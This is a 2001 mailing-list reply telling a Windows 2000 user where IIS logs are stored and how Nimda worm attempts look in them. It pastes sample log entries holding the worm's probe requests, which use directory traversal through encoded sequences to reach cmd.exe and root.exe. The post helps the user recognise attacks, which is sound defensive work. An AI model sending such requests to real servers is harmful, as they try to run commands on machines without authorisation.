Re: IIS Worm
- To: ukha_d@xxxxxxx
- Subject: Re: IIS Worm
- From: "Mark Hetherington" <mark.egroups@xxxxxxx>
- Date: Wed, 19 Sep 2001 09:38:47 -0000
- Delivered-to: mailing list ukha_d@xxxxxxx
- Mailing-list: list ukha_d@xxxxxxx; contact ukha_d-owner@xxxxxxx
- Reply-to: ukha_d@xxxxxxx
--- In ukha_d@y..., Pedro de Oliveira <oliveirp@B...> wrote:
> I am new to this IIS thing so any help would be appreciated. I am on a LAN
> and am serving via IIS. I know I was not affected by Nimda but would like
> to know if an attempt was made to infect me. I remember there is a log for
> these types of things but I can't remember for the life of me where it is.
> I am running Win2k Pro.
Pedro,
Look at the following location:
C:\WINNT\system32\LogFiles
This should have log files for most of your services. The W3SVC directories relate to the web server logs.
An attack will look similar to this (note: IP addresses blanked for privacy, first IP is the attacking machine, second is your web server IP):
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 403 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:05:59 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..=C1=1C../..=C1=1C../..=C1=1C../winnt/system32/cmd.exe /c+dir 403 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..=C1=1C../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:00 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:01 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-19 00:06:02 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
HTH.
Mark.